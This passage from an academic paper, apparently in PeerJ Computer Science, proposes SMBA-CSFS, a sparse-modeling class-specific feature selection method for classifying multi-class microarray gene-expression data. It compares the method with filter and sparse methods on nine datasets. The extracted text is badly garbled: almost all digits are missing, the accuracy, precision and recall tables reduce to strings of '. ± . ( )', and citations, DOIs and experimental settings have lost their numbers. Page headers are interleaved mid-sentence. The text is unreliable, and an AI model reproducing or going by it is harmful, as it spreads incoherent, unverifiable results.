( ), the product xβ is transformed by a sigmoid function in order to address the classification problem. • en (zou & hastie, ): elastic net is a hybrid of ridge regression and lasso regularization. 
like lasso, elastic net can generate reduced models by achieving zero-valued coefficients. experimental studies have suggested that the elastic net technique can outperform lasso on data with highly correlated features. as for lasso, a modified version adapted for classification purposes has been implemented. • rfs (nie et al., ): robust feature selection method is a sparse based-learning approach for feature selection which emphasizes the joint ` , norm minimization on both loss and regularization function. • ls-` , (tang, alelyani & liu, ): ls-` , is a supervised sparse feature selection method. it exploits the` , -norm regularized regression model for joint feature selection, from multiple tasks where the classification objective function is a quadratic loss. • ll-` , (tang, alelyani & liu, ): ll-` , is a supervised sparse feature selection method which uses the same concept of ls-` , but instead uses a logistic loss as classification objective function. • fisher (gu, li & han, ): fisher is one of the most widely used supervised filter feature selection methods. it selects each feature as the ratio of inter-class separation and intraclass variance, where features are evaluated independently and, the final feature selection occurs by aggregating the m top ranked ones. • relief-f (kira & rendell, ; kononenko, ): relief-f is an iterative, randomized and supervised filter approach that estimates the quality of the features according to how well their values differentiate data samples that are near to each other; it does not discriminate among redundant features and performance decreases with few data. • mrmr (peng, long & ding, ): minimum-redundancy-maximum-relevance is a mutual information filter based algorithm which selects features according to the maximal statistical dependency criterion. nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • mi (kraskov, stögbauer & grassberger, ; ross, ): mutual information is a non-negative value, which measures the dependency between the variables. features are selected in a univariate way. the function relies on nonparametric methods based on entropy estimation from k-nearest neighbors distances. • smba: sparse-modeling based approach is nothing else that our smba-csfs model but that only takes into account the sdl strategy for selecting a subset of features considering all the classes in the feature selection process. we pre-processed all the data sets by using the z-score (kreyszig, ) normalization. to fairly compare the considered supervised feature selection methods, we have firstly tuned the parameters for all methods by using a ‘‘grid-search’’ strategy (tang, alelyani & liu, ) and finally, for evaluating the performance of all the methods, it has been considered a number of features ranging from to by performing a -fold cross validation (cv). the performance of the classification algorithms among all the methods have been evaluated by using the metrics of accuracy along with the standard deviations (acc ± std), precision (p), recall (r) and f-measure (f), which are computed as illustrated in sokolova & lapalme ( ). 
in addition, to give a better and summarized understanding between the performance of the models, we also computed the area under the curve (auc) and the receiver operating characteristic (roc) curves, where the former is a useful tool for evaluating the quality of class separation for a classifier while the latter makes it easier to compare the roc curve of one model to another. discussion the experiments have been performed on a workstation with a dual intel(r) xeon(r) . ghz and gb ram. the developed code is available at nardone, ciaramella & staiano ( b). for the sake of readability, all the results presented here account only for the svm classifier, since the performance proved that the proposed approach is a little sensitive to the choice of a specific classifier (indeed, the performance of each classifier are rather comparable). nevertheless, the interested reader may refer to the supplemental material for details on additional results concerning all the used classifiers. the experimental results on -fold cv for the svm classifier are summarized in tables – . figures – show all the accounted model evaluation metrics for the ten feature selection methods on the nine considered data sets. we compared the performance of our method against tfs methods (see tables – ) and gf-csfs framework (see tables – ). by looking at accuracy, precision, recall and f-measure, smba-csfs is able to better discriminate among the classes of the lung_c, lung_d, carcinom, dlblc and gcm data sets in most of the cases, when top and features are considered. in this latter case, when smba-csfs performs worse then its competitors, the corresponding performance tend to be comparable. on the remaining data sets, each with a number of classes less than , namely, allaml, leukemia, cll_sub_ and glioma, smba-csfs is instead outperformed by some of the competitors. consequently, we can assert that smba-csfs behaves better when working with data sets with many classes (at least ). one possible reason is due to the nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table svm accuracy results (acc ± std) on top features using -fold cv on different data sets. tfs methods are compared against our methods (smba and smba-csfs). fs: fisher score, mrmr: minimum-redundancy-maximum-relevance, mi: mutual information, rfs: robust feature selector, en: elastic net, bsl: all features. the best results are highlighted in bold. the number in parentheses is the number of features when the performance is achieved. average accuracy of top features (%) allaml leukemia cll_sub_ glioma lung_c lung_d dlbcl carcinom gcm fisher . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) relief . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) mrmr . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) mi . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) ls- . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) ll- ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) rfs ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) lasso . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) en . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) smba . ± . ( ) . ± . ( ) . ± . ( ) . ± . 
( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) smba-csfs . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) bsl . ± . . ± . . ± . ± . . ± . . ± . ± . . ± . ± . n ardone etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table svm precision(p), recall(r) and f-measure(f) on top features using -fold cv on different data sets. tfs methods are compared against our methods (smba and smba-csfs). fs: fisher score, mrmr: minimum-redundancy-maximum-relevance, mi: mutual information, rfs: robust feature selector, en: elastic net, bsl: all features. the best results are highlighted in bold. the number in parentheses is the number of features when the performance is achieved. allaml leukemia cll_sub_ glioma lung_c lung_d dlbcl carcinom gcm( ) p r f p r f p r f p r f p r f p r f p r f p r f p r f fisher . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . relief . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . mrmr . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . mi . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . ls_l . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . ll_l . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . rfs . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . lasso . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . en . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . smba . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . smba-csfs . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . bsl . . . . . . . . . . . . . . . n ardone etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table svm accuracy results (acc ± std) on top features using -fold cv on different data sets. gf-csfs (pineda-bautista, carrasco-ochoa & martınez- trinidad, ) framework is compared against our smba-csfs. fs: fisher score, mrmr: minimum-redundancy-maximum-relevance, mi: mutual information, rfs: robust feature selector, en: elastic net, bsl: all features. the best results are highlighted in bold. the number in parentheses is the number of features when the performance is achieved. average accuracy of top features (%) allaml leukemia cll_sub_ glioma lung_c lung_d dlbcl carcinom gcm fisher . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) relief . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) mrmr . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) mi . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) ls- . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) ll- . ± . ( ) . ± . 
( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) rfs . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) lasso . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) en . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) ± . ( ) . ± . ( ) . ± . ( ) smba-csfs . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( )} . ± . ( ) . ± . ( ) . ± . ( ) . ± . ( ) bsl . ± . . ± . . ± . ± . . ± . . ± . ± . . ± . ± . n ardone etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table svm precision(p), recall(r) and f-measure(f) on top features using -fold cv on different data sets. gf-csfs (pineda-bautista, carrasco-ochoa & martınez-trinidad, ) framework is compared against our smba-csfs. fs: fisher score, mrmr: minimum-redundancy-maximum-relevance, mi: mutual information, rfs: robust feature selector, en: elastic net, bsl: all features. the best results are highlighted in bold. the number in parentheses is the number of features when the performance is achieved. allaml leukemia cll_sub_ glioma lung_c lung_d dlbcl carcinom gcm( ) p r f p r f p r f p r f p r f p r f p r f p r f p r f fisher . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . relief . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . mrmr . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . mi . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . ls_l . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . ll_l . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . rfs . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . lasso . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . en . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . smba-csfs . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . bsl . . . . . . . . . . . . . . . n ardone etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparison of several tfs accuracies against smba and smba-csfs on nine data sets: (a) allaml( ), (b) leukemia( ), (c) cll_sub_ ( ), (d) glioma( ), (e) lung_c( ), (f) lung_d( ), (g) dlbcl( ), (h) carcinom( ), (i) gcm( ), when a varying number of features is selected. svm classifier with -fold cv was used. full-size doi: . /peerjcs. /fig- sparse-modeling approach in selecting the features and the use of an ensemble classifier. indeed, since the ensemble is based on a majority voting schema, smba-csfs is able to guess, with higher probability, the belonging of samples coming from data sets with many classes. just think that, whenever our method draws from a sample of a two-class data set, the probability of a right guess is proportional to a coin toss. 
therefore if, on one hand, this leads to good performance when the data set consists of many classes, the probability of failure, on the other hand, increases in the case of data sets consisting of fewer classes. anyhow, the local structure of data distribution which is crucial for feature selection, as stated in he, cai & niyogi ( ), may be a logical reason why the sbma schema performs better on certain data set rather than others. in addition, as shown in fig. , it is worth observing that smba-csfs seems to perform better w.r.t. tfs competitors on a fewer number of features. this would suggest that smba-csfs is able to identify/retrieve the most representative features that maximize the classification accuracy. to assert the nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure average roc curves and the corresponding auc values on the first features compar- ing the classification performance among smba-csfs and tfs methods for nine data sets: (a) al- laml( ), (b) leukemia( ), (c) cll_sub_ ( ), (d) glioma( ), (e) lung_c( ), (f) lung_d( ), (g) dlbcl( ), (h) carcinom( ), (i) gcm( ). svm classifier with -fold cv was used. full-size doi: . /peerjcs. /fig- previous results achieved, we computed the average roc curves between smba-csfs and the other tfs methods on a subset of and features, respectively. looking at the auc values in fig. , it would suggest smba-csfs as the best model to choose for identifying the most representative features in a classification task when dealing with data set with many classes. concerning with the gf-csfs competitors, as shown in fig. , it would suggest that the sparse modeling process, underlying the proposed smba scheme for feature selection, is more suitable for retrieving the best features for the purpose of classification, often leading to get satisfactory results. such statement is also proved by the good balance between precision and recall shown in table and the average roc curves shown in fig. , where smba-csfs still holds a candle w.r.t. gf-csf methods. the reader’s attention is drawn to the supplemental material for all the experimental results and consideration arisen on the top features. to statistically validate the results and compare all the competing classifiers against the proposed smba-csfs, on both and feature subsets, we ran non-parametric multiple nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure comparison of several csfs accuracies against smba-csfs on nine data sets: (a) allaml( ), (b) leukemia( ), (c) cll_sub_ ( ), (d) glioma( ), (e) lung_c( ), (f) lung_d( ), (g) dlbcl( ), (h) carcinom( ), (i) gcm( ), when a varying number of features is selected. svm classifier with -fold cv was used. full-size doi: . /peerjcs. /fig- comparison tests (all vs all) (demšar, ; rodríguez-fdez et al., ) which sequentially performs a popular multi-class friedman nonparametric test (friedman, ) followed by a nemenyi post-hoc multiple comparison (dunn, ). the ranking of the classifiers, when the top and features are selected, along with the corresponding p-values, are described in the supplemental material. looking at the cumulative rank (cr) for each classifier, one can notice how smba-csfs achieves optimal results, always finishing in the first three positions. 
however, it is worth emphasizing that our method ranks systematically on the top position when considering data sets consisting of five or more classes (named cr≥ ). these results prove again that smba-csfs achieves good performance on data sets with many classes. moreover, by using different classifiers we do not observe noteworthy differences in the results, meaning that the methodology is suitable for the classification of this kind of data, independently from the selected classifier. however, by looking at the p-values, corresponding to the single ranking method, one can better verify which algorithms have nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure average roc curves and the corresponding auc values on the first features comparing the classification performance among smba-csfs and several csfs methods for nine data sets: (a) allaml( ), (b) leukemia( ), (c) cll_sub_ ( ), (d) glioma( ), (e) lung_c( ), (f) lung_d( ), (g) dlbcl( ), (h) carcinom( ), (i) gcm( ). svm classifier with -fold cv was used. full-size doi: . /peerjcs. /fig- significantly different performance w.r.t. smba-csfs. for detailed information regarding the results, see the supplemental material. concerning the computational complexity, from several conducted experiments we observed that the proposed methodology may be slower than other techniques (e.g., fs and relief whose running times are in term of few seconds) but comparable with smba. its running time, depending on several parameters involved, especially in the size of the number of instances and classes of the data sets, may vary from a couple of hours to at most one day (see table s for details on the computational time). nevertheless, smba-csfs achieves appreciable performance when working on large data sets and number of classes, and sometimes, in the biological field, the accuracy in finding key features that are responsible for some biological processes is preferred to the execution time. however, since most of the time consumed by the proposed approach is due to the solution of the optimization problem by using the admm method, and because the nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. methodology is based on an ensemble of classifiers, a parallel computing approach could be adopted to obtain a faster computational time (deng et al., ). conclusions we proposed a sparse-modeling based approach for feature selection with emphasizing joint ` , -norm minimization and the class-specific feature selection. experimental results, on nine different data sets, validate the unique aspects of smba-csfs and demonstrate the promising performance achieved against the-state-of-art methods. one of the main characteristics of our framework is that, by jointly exploiting the idea of sparse modeling and class-specific feature selection, it is able to identify/retrieve the most representative features that maximize the classification accuracy in those cases where a given data set is made up of many classes. based on our experimental results, we can conclude that, usually applying tfs allows achieving better results than using all the available features. however, in many cases, applying the proposed smba-csfs method allows improving the performance of just tfs as well as gf-csfs injected with several tfs methods. 
conclusions
we proposed a sparse-modeling based approach for feature selection, emphasizing joint ℓ2,1-norm minimization and class-specific feature selection. experimental results on nine different data sets validate the unique aspects of smba-csfs and demonstrate the promising performance achieved against state-of-the-art methods. one of the main characteristics of our framework is that, by jointly exploiting the ideas of sparse modeling and class-specific feature selection, it is able to identify/retrieve the most representative features, i.e., those that maximize the classification accuracy, when a given data set is made up of many classes. based on our experimental results, we can conclude that applying tfs usually achieves better results than using all the available features; however, in many cases the proposed smba-csfs method improves on plain tfs as well as on gf-csfs injected with several tfs methods. it has to be stressed that smba-csfs seems particularly suitable for large data sets consisting of many classes, while on data sets with fewer than five classes other methods appear to be more effective. although the smba, smba-csfs and tfs performances differ only slightly on the whole, it is worth highlighting that smba-csfs achieves its best performance when considering fewer features (i.e., from to ) on data sets with many classes, which is an important goal when certain biological tasks are taken into account. we believe that these techniques might be effectively used in a systematic way after a microarray analysis: a better gene selection step could avoid wasting many resources in post-array wet analysis (e.g., real-time pcr), allowing researchers to focus their attention just on the relevant features. finally, we think this method has proved to be an interesting alternative among fs approaches for microarray data. as future work, the focus will move towards the biological interpretation of the smba framework behavior, by systematically studying the selected genes, especially for the smba-csfs approach which, as shown by the experimental results, is more effective in selecting genes of interest than the standard smba. furthermore, we are planning to test our approach on the epic data set (demetriou et al., ), after a thorough analysis of pre-filtering, and to develop a parallel implementation to substantially reduce its computational time.

acknowledgements
the research was entirely developed when davide nardone was a master degree student in applied computer science at university of naples parthenope.

additional information and declarations

funding
this work was supported by dipartimento di scienze e tecnologie, università degli studi di napoli "parthenope" (sostegno alla ricerca individuale per il triennio – project). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: dipartimento di scienze e tecnologie, università degli studi di napoli "parthenope" (sostegno alla ricerca individuale per il triennio – project).

competing interests
the authors declare there are no competing interests.

author contributions
• davide nardone conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft.
• angelo ciaramella and antonino staiano conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft.

data availability
the following information was supplied regarding data availability: the data supporting the experiments in this article are available at zenodo: davide nardone. ( ). biological datasets for smba (version . . ). http://doi.org/ . /zenodo. . a python software package is available through github at https://github.com/davidenardone/a-sparse-coding-based-approach-for-class-specific-feature-selection, containing all the source code used to run the software.

supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

references
aharon m, elad m, bruckstein a. .
k-svd: an algorithm for designing overcom- plete dictionaries for sparse representation. ieee transactions on signal processing ( ): – doi . /tsp. . . alizadeh aa, eisen mb, davis re, ma c, lossos is, rosenwald a, boldrick jc, sabet h, tran t, yu x, powell ji, yang l, marti ge, moore t, hudson jj, lu l, lewis db, nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://doi.org/ . /zenodo. http://doi.org/ . /zenodo. https://github.com/davidenardone/a-sparse-coding-based-approach-for-class-specific-feature-selection https://github.com/davidenardone/a-sparse-coding-based-approach-for-class-specific-feature-selection https://github.com/davidenardone/a-sparse-coding-based-approach-for-class-specific-feature-selection http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /peerj-cs. tibshirani r, sherlock g, chan wc, greiner tc, weisenburger dd, armitage jo, warnke r, levy r, wilson w, grever mr, byrd jc, botstein d, brown p, staudt lm. . distinct types of diffuse large b-cell lymphoma identified by gene expression profiling. nature ( ): – doi . / . bhattacharjee a, richards wg, staunton j, li c, monti s, vasa p, ladd c, beheshti j, bueno r, gillette m, loda m, weber g, mark ej, lander es, wong w, johnson be, golub tr, sugarbaker dj, meyerson m. . classification of human lung carcinomas by mrna expression profiling reveals distinct adenocarcinoma subclasses. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . boyd s, parikh n, chu e, peleato b, eckstein j. . distributed optimization and statistical learning via the alternating direction method of multipliers. foundations and trends in machine learning ( ): – doi . / . calcagno g, staiano a, fortunato g, brescia-morra v, salvatore e, liguori r, capone s, filla a, longo g, sacchetti l. . a multilayer perceptron neural network-based approach for the identification of responsiveness to interferon therapy in multiple sclerosis patients. information sciences ( ): – doi . /j.ins. . . . camastra f, di taranto m, staiano a. . statistical and computational methods for genetic diseases: an overview. computational and mathematical methods in medicine : . chawla nv, bowyer kw, hall lo, kegelmeyer wp. . smote: synthetic minority over-sampling technique. journal of artificial intelligence research : – doi . /jair. . ciaramella a, cocozza s, iorio f, miele g, napolitano f, pinelli m, raiconi g, tagli- aferri r. . interactive data analysis and clustering of genomic data. neural networks ( – ): – doi . /j.neunet. . . . ciaramella a, gianfico m, giunta g. . compressive sampling and adaptive dictio- nary learning for the packet loss recovery in audio multimedia streaming. multime- dia tools and applications ( ): – doi . /s - - -x. ciaramella a, giunta g. . packet loss recovery in audio multimedia streaming by using compressive sensing. iet communications ( ): – doi . /iet-com. . . demetriou ca, chen j, polidoro s, van veldhoven k, cuenin c, campanella g, brennan k, clavel-chapelon f, dossus l, kvaskoff m, drogan d, boeing h, kaaks r, risch a, trichopoulos d, lagiou p, masala g, sieri s, tumino r, panico s, quirós jr, sánchez perez mj, amiano p, huerta castaño jm, ardanaz e, onland-moret c, peeters p, khaw kt, wareham n, key tj, travis rc, romieu i, gallo v, gunter m, herceg z, kyriacou k, riboli e, flanagan jm, vineis p. . 
methylome analysis and epigenetic changes associated with menarcheal age. plos one ( ):e doi . /journal.pone. . demšar j. . statistical comparisons of classifiers over multiple data sets. journal of machine learning research (jan): – . nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . /pnas. http://dx.doi.org/ . / http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /jair. http://dx.doi.org/ . /j.neunet. . . http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /iet-com. . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. deng w, lai m-j, peng z, yin w. . parallel multi-block admm with o ( /k) conver- gence. journal of scientific computing ( ): – doi . /s - - - . di taranto md, staiano a, d’agostino mn, d’angelo a, bloise e, morgante a, marotta g, gentile m, rubba p, fortunato g. . association of usf and apoa polymorphisms with familial combined hyperlipidemia in an italian pop- ulation. molecular and cellular probes ( ): – doi . /j.mcp. . . . draghici s, khatri p, eklund a, szallasi z. . reliability and reproducibility issues in dna microarray measurements. trends in genetics ( ): – doi . /j.tig. . . . dunn oj. . multiple comparisons among means. journal of the american statistical association ( ): – doi . / . . . elhamifar e, sapiro g, vidal r. . see all by looking at a few: sparse modeling for finding representative objects. in: ieee conference on computer vision and pattern recognition. piscataway: ieee, – . engan k, aase so, husoy jh. . method of optimal directions for frame design. in: ieee international conference on acoustics, speech, and signal processing. piscataway: ieee, – . friedman j, hastie t, tibshirani r. . the elements of statistical learning. vol. . new-york: springer. friedman m. . the use of ranks to avoid the assumption of normality implicit in the analysis of variance. journal of the american statistical association ( ): – doi . / . . . fu x, wang l. . a ga-based rbf classifier with class-dependent features. in: evolutionary computation, . cec’ . proceedings of the congress on, vol. . ieee, – . golub tr, slonim dk, tamayo p, huard c, gaasenbeek m, mesirov jp, coller h, loh ml, downing jr, caligiuri ma, bloomfield cd, lander es. . molecular classification of cancer: class discovery and class prediction by gene expression monitoring. science ( ): – doi . /science. . . . gu q, li z, han j. . generalized fisher score for feature selection. arxiv preprint. arxiv: . a . guyon i, elisseeff a. . an introduction to variable and feature selection. journal of machine learning research : – . haslinger c, schweifer n, stilgenbauer s, döhner h, lichter p, kraut n, stratowa c, abseher r. . microarray gene expression profiling of b-cell chronic lymphocytic leukemia subgroups defined by genomic aberrations and vh mutation status. journal of clinical oncology ( ): – doi . /jco. . . . he x, cai d, niyogi p. . laplacian score for feature selection, advances in nerual information processing systems. cambridge: mit press. hoque n, bhattacharyya dk, kalita jk. . mifs-nd: a mutual information-based feature selection method. expert systems with applications ( ): – doi . /j.eswa. . . . nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.mcp. . . http://dx.doi.org/ . /j.tig. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /science. . . http://arxiv.org/abs/ . a http://dx.doi.org/ . /jco. . . 
http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /peerj-cs. jolliffe it. . principal component analysis and factor analysis. in: principal compo- nent analysis. new york: springer, – . jović a, brkić k, bogunović n. . a review of feature selection methods with appli- cations. in: th international convention on information and communication technology, electronics and microelectronics (mipro). ieee, – . kira k, rendell la. . a practical approach to feature selection. in: proceedings of the ninth international workshop on machine learning. – . kononenko i. . estimating attributes: analysis and extensions of relief. in: european conference on machine learning. berlin, heidelberg: springer, – . kraskov a, stögbauer h, grassberger p. . estimating mutual information. physical review e ( ): – doi . /physreve. . . kreyszig e. . advanced engineering mathematics. chichester: john wiley & sons. mairal j, bach f, ponce j, sapiro g, zisserman a. . discriminative learned dictio- naries for local image analysis. in: ieee conference on computer vision and pattern recognition, . cvpr . piscataway: ieee, – . mairal j, bach f, ponce j, sapiro g, zisserman a. . non-local sparse models for image restoration. in: ieee th international conference on computer vision and pattern recognition. piscataway: ieee, – . nardone d, ciaramella a, staiano a. a. biological datasets. available at https: //zenodo.org/record/ #.xxkatugzauk. nardone d, ciaramella a, staiano a. b. source code. available at https://github. com/davidenardone/a-sparse-coding-based-approach-for-class-specific-feature- selection. nie f, huang h, cai x, ding ch. . efficient and robust feature selection via joint ` , -norms minimization. in: advances in neural information processing systems. vancouver, british columbia, canada, – . nutt cl, mani d, betensky ra, tamayo p, cairncross jg, ladd c, pohl u, hartmann c, mclaughlin me, batchelor tt, black pm, von deimling a, pomeroy sl, golub sl, louis dn. . gene expression-based classification of malignant gliomas correlates better with survival than histological classification. cancer research ( ): – . peng h, long f, ding c. . feature selection based on mutual information criteria of max-dependency, max-relevance, and min-redundancy. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . pineda-bautista bb, carrasco-ochoa ja, martınez-trinidad jf. . general framework for class-specific feature selection. expert systems with applications ( ): – doi . /j.eswa. . . . ramaswamy s, tamayo p, rifkin r, mukherjee s, yeang c-h, angelo m, ladd c, reich m, latulippe e, mesirov jp, poggio t, gerald wl, loda mf, lander es, golub tr. . multiclass cancer diagnosis using tumor gene expression signatures. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /physreve. . https://zenodo.org/record/ #.xxkatugzauk https://zenodo.org/record/ #.xxkatugzauk https://github.com/davidenardone/a-sparse-coding-based-approach-for-class-specific-feature-selection https://github.com/davidenardone/a-sparse-coding-based-approach-for-class-specific-feature-selection https://github.com/davidenardone/a-sparse-coding-based-approach-for-class-specific-feature-selection http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . 